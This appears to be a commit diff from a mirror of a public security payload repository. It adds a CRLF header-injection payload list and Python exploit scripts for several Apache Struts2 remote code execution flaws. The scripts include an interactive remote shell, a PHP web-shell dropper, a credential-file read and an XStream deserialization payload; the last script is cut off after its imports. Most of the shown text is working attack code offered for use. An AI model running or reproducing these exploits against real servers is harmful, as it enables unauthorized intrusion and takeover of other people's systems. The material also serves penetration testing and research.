mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-09 11:46:14 +02:00
Deployed 9571306
with MkDocs version: 1.5.3
This commit is contained in:
commit
c5b83becd7
File diff suppressed because it is too large
Load Diff
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,17 @@
|
|||
/%%0a0aSet-Cookie:crlf=injection
|
||||
/%0aSet-Cookie:crlf=injection
|
||||
/%0d%0aSet-Cookie:crlf=injection
|
||||
/%0dSet-Cookie:crlf=injection
|
||||
/%23%0aSet-Cookie:crlf=injection
|
||||
/%23%0d%0aSet-Cookie:crlf=injection
|
||||
/%23%0dSet-Cookie:crlf=injection
|
||||
/%25%30%61Set-Cookie:crlf=injection
|
||||
/%25%30aSet-Cookie:crlf=injection
|
||||
/%250aSet-Cookie:crlf=injection
|
||||
/%25250aSet-Cookie:crlf=injection
|
||||
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
|
||||
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
|
||||
/%2F..%0d%0aSet-Cookie:crlf=injection
|
||||
/%3f%0d%0aSet-Cookie:crlf=injection
|
||||
/%3f%0dSet-Cookie:crlf=injection
|
||||
/%u000aSet-Cookie:crlf=injection
|
File diff suppressed because one or more lines are too long
Binary file not shown.
After Width: | Height: | Size: 407 KiB |
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,215 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
from __future__ import print_function
|
||||
from future import standard_library
|
||||
standard_library.install_aliases()
|
||||
from builtins import input
|
||||
from builtins import str
|
||||
import urllib.request, urllib.error, urllib.parse
|
||||
import time
|
||||
import sys
|
||||
import os
|
||||
import subprocess
|
||||
import requests
|
||||
import readline
|
||||
import urllib.parse
|
||||
|
||||
RED = '\033[1;31m'
|
||||
BLUE = '\033[94m'
|
||||
BOLD = '\033[1m'
|
||||
GREEN = '\033[32m'
|
||||
OTRO = '\033[36m'
|
||||
YELLOW = '\033[33m'
|
||||
ENDC = '\033[0m'
|
||||
|
||||
def cls():
|
||||
os.system(['clear', 'cls'][os.name == 'nt'])
|
||||
cls()
|
||||
|
||||
logo = BLUE+'''
|
||||
___ _____ ___ _ _ _____ ___
|
||||
( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\
|
||||
| (_(_) | | | (_) )| | | | | | | (_(_)
|
||||
`\__ \ | | | , / | | | | | | `\__ \
|
||||
( )_) | | | | |\ \ | (_) | | | ( )_) |
|
||||
`\____) (_) (_) (_)(_____) (_) `\____)
|
||||
|
||||
=[ Command Execution v3]=
|
||||
By @s1kr10s
|
||||
'''+ENDC
|
||||
print(logo)
|
||||
|
||||
print(" * Ejemplo: http(s)://www.victima.com/files.login\n")
|
||||
host = input(BOLD+" [+] HOST: "+ENDC)
|
||||
|
||||
if len(host) > 0:
|
||||
if host.find("https://") != -1 or host.find("http://") != -1:
|
||||
|
||||
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
|
||||
|
||||
def exploit(comando):
|
||||
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
|
||||
return exploit
|
||||
|
||||
def exploit2(comando):
|
||||
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
|
||||
return exploit2
|
||||
|
||||
def exploit3(comando):
|
||||
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
|
||||
return exploit3
|
||||
|
||||
def pwnd(shellfile):
|
||||
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
|
||||
return exploitfile
|
||||
|
||||
def validador():
|
||||
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
|
||||
return arr_lin_win
|
||||
|
||||
#def reversepl(ip,port):
|
||||
# print "perl"
|
||||
|
||||
#def reversepy(ip,port):
|
||||
# print "python"
|
||||
|
||||
# CVE-2013-2251 ---------------------------------------------------------------------------------
|
||||
try:
|
||||
response = ''
|
||||
response = urllib.request.urlopen(host+poc)
|
||||
except:
|
||||
print(RED+" Servidor no responde\n"+ENDC)
|
||||
exit(0)
|
||||
|
||||
print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
|
||||
|
||||
if response.read().find("mamalo") != -1:
|
||||
print(RED+" [-] VULNERABLE"+ENDC)
|
||||
owned = open('vulnsite.txt', 'a')
|
||||
owned.write(str(host)+'\n')
|
||||
owned.close()
|
||||
|
||||
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
|
||||
#print BOLD+" * [SHELL REVERSA]"+ENDC
|
||||
#print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
|
||||
if opcion == 's':
|
||||
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
|
||||
time.sleep(1)
|
||||
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
|
||||
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
|
||||
|
||||
while 1:
|
||||
separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
|
||||
espacio = separador.split(' ')
|
||||
comando = "','".join(espacio)
|
||||
|
||||
if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
|
||||
shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
|
||||
print("\n"+shell.read())
|
||||
elif espacio[0] == 'pwnd':
|
||||
pathsave=input("path EJ:/tmp/: ")
|
||||
|
||||
if espacio[1] == 'php':
|
||||
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
|
||||
urllib.request.urlopen(host+pwnd(str(shellfile)))
|
||||
shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
|
||||
if shell.read().find(pathsave+"status.php") != -1:
|
||||
print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
|
||||
else:
|
||||
print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
|
||||
|
||||
# CVE-2017-5638 ---------------------------------------------------------------------------------
|
||||
print(BLUE+" [-] NO VULNERABLE"+ENDC)
|
||||
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
|
||||
x = 0
|
||||
while x < len(validador()):
|
||||
valida = validador()[x]
|
||||
|
||||
try:
|
||||
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
|
||||
result = urllib.request.urlopen(req).read()
|
||||
|
||||
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
|
||||
print(RED+" [-] VULNERABLE"+ENDC)
|
||||
owned = open('vulnsite.txt', 'a')
|
||||
owned.write(str(host)+'\n')
|
||||
owned.close()
|
||||
|
||||
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
|
||||
if opcion == 's':
|
||||
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
|
||||
time.sleep(1)
|
||||
|
||||
while 1:
|
||||
try:
|
||||
separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
|
||||
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
|
||||
result = urllib.request.urlopen(req).read()
|
||||
print("\n"+result)
|
||||
except:
|
||||
exit(0)
|
||||
else:
|
||||
x = len(validador())
|
||||
else:
|
||||
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
|
||||
except:
|
||||
pass
|
||||
x=x+1
|
||||
|
||||
# CVE-2018-11776 ---------------------------------------------------------------------------------
|
||||
print(BLUE+" [-] NO VULNERABLE"+ENDC)
|
||||
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
|
||||
x = 0
|
||||
while x < len(validador()):
|
||||
#Filtramos la url solo dominio
|
||||
url = host.replace('#', '%23')
|
||||
url = host.replace(' ', '%20')
|
||||
if ('://' not in url):
|
||||
url = str("http://") + str(url)
|
||||
scheme = urllib.parse.urlparse(url).scheme
|
||||
site = scheme + '://' + urllib.parse.urlparse(url).netloc
|
||||
|
||||
#Filtramos la url solo path
|
||||
file_path = urllib.parse.urlparse(url).path
|
||||
if (file_path == ''):
|
||||
file_path = '/'
|
||||
|
||||
valida = validador()[x]
|
||||
try:
|
||||
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
|
||||
|
||||
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
|
||||
print(RED+" [-] VULNERABLE"+ENDC)
|
||||
owned = open('vulnsite.txt', 'a')
|
||||
owned.write(str(host)+'\n')
|
||||
owned.close()
|
||||
|
||||
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
|
||||
if opcion == 's':
|
||||
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
|
||||
time.sleep(1)
|
||||
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
|
||||
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
|
||||
|
||||
while 1:
|
||||
separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
|
||||
espacio = separador.split(' ')
|
||||
comando = "%20".join(espacio)
|
||||
|
||||
shell = urllib.request.urlopen(host+exploit3(str(comando)))
|
||||
print("\n"+shell.read())
|
||||
|
||||
else:
|
||||
x = len(validador())
|
||||
exit(0)
|
||||
else:
|
||||
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
|
||||
except:
|
||||
pass
|
||||
x=x+1
|
||||
else:
|
||||
print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
|
||||
exit(0)
|
||||
else:
|
||||
print(RED+" Debe Ingresar una Url\n"+ENDC)
|
||||
exit(0)
|
|
@ -0,0 +1,326 @@
|
|||
#!/usr/bin/env python3
|
||||
# coding=utf-8
|
||||
# *****************************************************
|
||||
# struts-pwn: Apache Struts CVE-2017-9805 Exploit
|
||||
# Author:
|
||||
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
|
||||
# This code is based on:
|
||||
# https://github.com/rapid7/metasploit-framework/pull/8924
|
||||
# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
|
||||
# *****************************************************
|
||||
from __future__ import print_function
|
||||
from builtins import str
|
||||
import argparse
|
||||
import requests
|
||||
import sys
|
||||
|
||||
# Disable SSL warnings
|
||||
try:
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if len(sys.argv) <= 1:
|
||||
print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
|
||||
print('[*] Struts-PWN - @mazen160')
|
||||
print('\n%s -h for help.' % (sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u", "--url",
|
||||
dest="url",
|
||||
help="Check a single URL.",
|
||||
action='store')
|
||||
parser.add_argument("-l", "--list",
|
||||
dest="usedlist",
|
||||
help="Check a list of URLs.",
|
||||
action='store')
|
||||
parser.add_argument("-c", "--cmd",
|
||||
dest="cmd",
|
||||
help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
|
||||
action='store',
|
||||
default='echo test > /tmp/struts-pwn')
|
||||
parser.add_argument("--exploit",
|
||||
dest="do_exploit",
|
||||
help="Exploit.",
|
||||
action='store_true')
|
||||
args = parser.parse_args()
|
||||
url = args.url if args.url else None
|
||||
usedlist = args.usedlist if args.usedlist else None
|
||||
url = args.url if args.url else None
|
||||
cmd = args.cmd if args.cmd else None
|
||||
do_exploit = args.do_exploit if args.do_exploit else None
|
||||
|
||||
|
||||
def url_prepare(url):
|
||||
url = url.replace('#', '%23')
|
||||
url = url.replace(' ', '%20')
|
||||
if ('://' not in url):
|
||||
url = str('http') + str('://') + str(url)
|
||||
return(url)
|
||||
|
||||
|
||||
def exploit(url, cmd, dont_print_status_on_console=False):
|
||||
url = url_prepare(url)
|
||||
if dont_print_status_on_console is False:
|
||||
print('\n[*] URL: %s' % (url))
|
||||
print('[*] CMD: %s' % (cmd))
|
||||
cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
|
||||
|
||||
payload = """
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||
<dataHandler>
|
||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||
<is class="javax.crypto.CipherInputStream">
|
||||
<cipher class="javax.crypto.NullCipher">
|
||||
<initialized>false</initialized>
|
||||
<opmode>0</opmode>
|
||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="java.util.Collections$EmptyIterator"/>
|
||||
<next class="java.lang.ProcessBuilder">
|
||||
<command>
|
||||
{0}
|
||||
</command>
|
||||
<redirectErrorStream>false</redirectErrorStream>
|
||||
</next>
|
||||
</iter>
|
||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||
<method>
|
||||
<class>java.lang.ProcessBuilder</class>
|
||||
<name>start</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>foo</name>
|
||||
</filter>
|
||||
<next class="string">foo</next>
|
||||
</serviceIterator>
|
||||
<lock/>
|
||||
</cipher>
|
||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||
<ibuffer/>
|
||||
<done>false</done>
|
||||
<ostart>0</ostart>
|
||||
<ofinish>0</ofinish>
|
||||
<closed>false</closed>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
</map>
|
||||
""".format(cmd)
|
||||
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Referer': str(url),
|
||||
'Content-Type': 'application/xml',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 3
|
||||
try:
|
||||
output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
output = 'ERROR'
|
||||
return(output)
|
||||
|
||||
|
||||
def check(url):
|
||||
url = url_prepare(url)
|
||||
print('\n[*] URL: %s' % (url))
|
||||
|
||||
initial_request = exploit(url, "", dont_print_status_on_console=True)
|
||||
if initial_request == "ERROR":
|
||||
result = False
|
||||
print("The host does not respond as expected.")
|
||||
return(result)
|
||||
|
||||
payload_sleep_based_10seconds = """
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||
<dataHandler>
|
||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||
<is class="javax.crypto.CipherInputStream">
|
||||
<cipher class="javax.crypto.NullCipher">
|
||||
<initialized>false</initialized>
|
||||
<opmode>0</opmode>
|
||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="java.util.Collections$EmptyIterator"/>
|
||||
<next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
|
||||
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
|
||||
<default>
|
||||
<__name>Pwnr</__name>
|
||||
<__bytecodes>
|
||||
<byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
|
||||
dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
|
||||
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
|
||||
bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
|
||||
bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
|
||||
c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
|
||||
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
|
||||
YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
|
||||
eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
|
||||
cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
|
||||
L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
|
||||
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
|
||||
KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
|
||||
eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
|
||||
L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
|
||||
amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
|
||||
ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
|
||||
bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
|
||||
YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
|
||||
L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
|
||||
BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
|
||||
MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
|
||||
AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
|
||||
AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
|
||||
AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
|
||||
AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
|
||||
AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
|
||||
AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
|
||||
</byte-array>
|
||||
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
|
||||
dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
|
||||
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
|
||||
aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
|
||||
YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
|
||||
bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
|
||||
bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
|
||||
AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
|
||||
AAoAAQACABYAEAAJ</byte-array>
|
||||
</__bytecodes>
|
||||
<__transletIndex>-1</__transletIndex>
|
||||
<__indentNumber>0</__indentNumber>
|
||||
</default>
|
||||
<boolean>false</boolean>
|
||||
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
|
||||
</next>
|
||||
</iter>
|
||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||
<method>
|
||||
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
|
||||
<name>newTransformer</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>foo</name>
|
||||
</filter>
|
||||
<next class="string">foo</next>
|
||||
</serviceIterator>
|
||||
<lock/>
|
||||
</cipher>
|
||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||
<ibuffer/>
|
||||
<done>false</done>
|
||||
<ostart>0</ostart>
|
||||
<ofinish>0</ofinish>
|
||||
<closed>false</closed>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
</map>
|
||||
"""
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Referer': str(url),
|
||||
'Content-Type': 'application/xml',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 8
|
||||
try:
|
||||
requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
# if the response returned before the request timeout.
|
||||
# then, the host should not be vulnerable.
|
||||
# The request should return > 10 seconds, while the timeout is 8.
|
||||
result = False
|
||||
except Exception:
|
||||
result = True
|
||||
return(result)
|
||||
|
||||
|
||||
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
|
||||
if url:
|
||||
if not do_exploit:
|
||||
result = check(url)
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
print(output)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
print("[$] Request sent.")
|
||||
print("[.] If the host is vulnerable, the command will be executed in the background.")
|
||||
|
||||
if usedlist:
|
||||
URLs_List = []
|
||||
try:
|
||||
f_file = open(str(usedlist), 'r')
|
||||
URLs_List = f_file.read().replace('\r', '').split('\n')
|
||||
try:
|
||||
URLs_List.remove('')
|
||||
except ValueError:
|
||||
pass
|
||||
f_file.close()
|
||||
except Exception as e:
|
||||
print('Error: There was an error in reading list file.')
|
||||
print("Exception: " + str(e))
|
||||
exit(1)
|
||||
for url in URLs_List:
|
||||
if not do_exploit:
|
||||
result = check(url)
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
print(output)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
print("[$] Request sent.")
|
||||
print("[.] If the host is vulnerable, the command will be executed in the background.")
|
||||
|
||||
print('[%] Done.')
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
|
||||
except KeyboardInterrupt:
|
||||
print('\nKeyboardInterrupt Detected.')
|
||||
print('Exiting...')
|
||||
exit(0)
|
|
@ -0,0 +1,231 @@
|
|||
#!/usr/bin/env python3
|
||||
# coding=utf-8
|
||||
# *****************************************************
|
||||
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
|
||||
# Author:
|
||||
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
|
||||
# This code uses a payload from:
|
||||
# https://github.com/jas502n/St2-057
|
||||
# *****************************************************
|
||||
|
||||
from __future__ import print_function
|
||||
from future import standard_library
|
||||
standard_library.install_aliases()
|
||||
from builtins import str
|
||||
from builtins import range
|
||||
import argparse
|
||||
